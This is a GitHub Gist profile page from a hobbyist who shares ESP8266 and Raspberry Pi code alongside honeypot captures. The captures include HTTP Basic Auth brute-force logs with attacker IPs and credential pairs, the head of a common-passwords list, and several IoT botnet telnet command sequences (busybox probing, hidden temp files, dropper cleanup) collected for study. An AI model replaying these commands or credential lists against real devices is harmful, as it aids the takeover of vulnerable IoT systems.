Skip to content

Instantly share code, notes, and snippets.

Ondřej Doležal odolezal

Block or report user

Report or block odolezal

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@odolezal
odolezal / esp8266_getVcc.ino
Last active Apr 28, 2020
ESP8266 Internal input voltage reading
View esp8266_getVcc.ino
// Define input Vcc reading
ADC_MODE(ADC_VCC);
// ESP8266 Internal input voltage reading
float vccIn = ESP.getVcc() / 1000.0;
Serial.print("Input voltage (V): ");
Serial.println(vccIn);
@odolezal
odolezal / bap.log_[2020-04-10]_sample
Created Apr 13, 2020
Sample from bap - http Basic Authentication honeyPot
View bap.log_[2020-04-10]_sample
[2020-04-10 23:35:01,748] 188.161.169.188:4905 Basic admin:admin
[2020-04-10 23:35:05,376] 188.161.169.188:4921 Basic admin:admin
[2020-04-10 23:35:05,627] 188.161.169.188:5160 Basic admin:
[2020-04-10 23:35:05,899] 188.161.169.188:5180 Basic admin:
[2020-04-10 23:35:06,140] 188.161.169.188:5197 Basic :admin
[2020-04-10 23:35:06,363] 188.161.169.188:5214 Basic :admin
[2020-04-10 23:35:06,724] 188.161.169.188:5229 Basic admin:
[2020-04-10 23:35:07,699] 188.161.169.188:5253 Basic admin:
[2020-04-10 23:35:07,939] 188.161.169.188:5321 Basic admin:admin
[2020-04-10 23:35:08,160] 188.161.169.188:5339 Basic admin:admin
@odolezal
odolezal / bap.log_[2020-04-03]_sample
Created Apr 7, 2020
Sample from bap - http Basic Authentication honeyPot
View bap.log_[2020-04-03]_sample
[2020-04-03 16:15:48,699] 134.122.88.165:60175 Basic admin:
[2020-04-03 16:15:49,098] 134.122.88.165:60971 Basic admin:
[2020-04-03 16:15:49,556] 134.122.88.165:61586 Basic root:Bnet014175
[2020-04-03 16:15:49,931] 134.122.88.165:62188 Basic root:Bnet014175
[2020-04-03 16:15:50,797] 134.122.88.165:62687 Basic admin:Asd753JKl
[2020-04-03 16:15:51,254] 134.122.88.165:63872 Basic admin:Asd753JKl
[2020-04-03 16:15:51,793] 134.122.88.165:64454 Basic cryo:trapolla
[2020-04-03 16:15:52,187] 134.122.88.165:64956 Basic cryo:trapolla
[2020-04-03 16:15:52,658] 134.122.88.165:65423 Basic admin:HappyPass
[2020-04-03 16:15:53,125] 134.122.88.165:49934 Basic admin:HappyPass
View 10000_common_passwords
password
123456
12345678
1234
qwerty
12345
dragon
pussy
baseball
football
@odolezal
odolezal / simple_webserver_makerphat.py
Created Dec 11, 2019
Control Raspberry Pi GPIO via http web server: code designed for Cytron Maker pHAT
View simple_webserver_makerphat.py
#Control Raspberry Pi GPIO via http web server
#Original code from: https://github.com/e-tinkers/simple_httpserver
#==================================================================
#Code designed for Cytron Maker pHAT
#===================================
#Added:
#support control for all 8 LEDs ("/ledX/" URL endpoints)
#support control for buzzer
#some minnor HTML code changes
#=============================
@odolezal
odolezal / led-blink.py
Last active Dec 11, 2019
Random LED blinking for Cytron Maker pHAT
View led-blink.py
@odolezal
odolezal / Gemsbok_malware_sample_1
Created Nov 6, 2019
Catched by Telnet-Iot-Honeypot
View Gemsbok_malware_sample_1
enable
system
shell
sh
linuxshell
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
@odolezal
odolezal / Okapi_malware_sample_1
Created Oct 27, 2019
Catched by Telnet-Iot-Honeypot
View Okapi_malware_sample_1
enable
system
shell
sh
ping ; sh
linuxshell; /bin/busybox LMAO
/bin/busybox cat /proc/cpuinfo || while read i; do echo $i; done < /proc/cpuinfo; /bin/busybox LMAO
/bin/busybox LMAO
>/tmp/.file && cd /tmp/
/bin/busybox rm -rf .file .z.binary .z.dropper
@odolezal
odolezal / Gopher_malware_sample_2
Created Oct 26, 2019
Catched by Telnet-Iot-Honeypot
View Gopher_malware_sample_2
enable
shell
sh
linuxshell
bah
hostname Ex0_3860
/bin/busybox Ex0
/bin/busybox ps; /bin/busybox Ex0
/bin/busybox cat /proc/mounts; /bin/busybox Ex0
/bin/busybox echo -e '\x45\x78\x30\x31/proc' > /proc/.nipped; /bin/busybox cat /proc/.nipped; /bin/busybox rm /proc/.nipped
@odolezal
odolezal / Camel_malware_sample_1
Created Oct 26, 2019
Catched by Telnet-Iot-Honeypot
View Camel_malware_sample_1
enable
shell
sh
/bin/busybox LOLKEK
/bin/busybox ps; /bin/busybox LOLKEK
/bin/busybox cat /proc/mounts; /bin/busybox LOLKEK
/bin/busybox echo -e '\x66\x75\x63\x6b/proc' > /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon
/bin/busybox echo -e '\x66\x75\x63\x6b/sys' > /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon
/bin/busybox echo -e '\x66\x75\x63\x6b/tmp' > /tmp/.nippon; /bin/busybox cat /tmp/.nippon; /bin/busybox rm /tmp/.nippon
/bin/busybox echo -e '\x66\x75\x63\x6b/overlay' > /overlay/.nippon; /bin/busybox cat /overlay/.nippon; /bin/busybox rm /overlay/.nippon
You can’t perform that action at this time.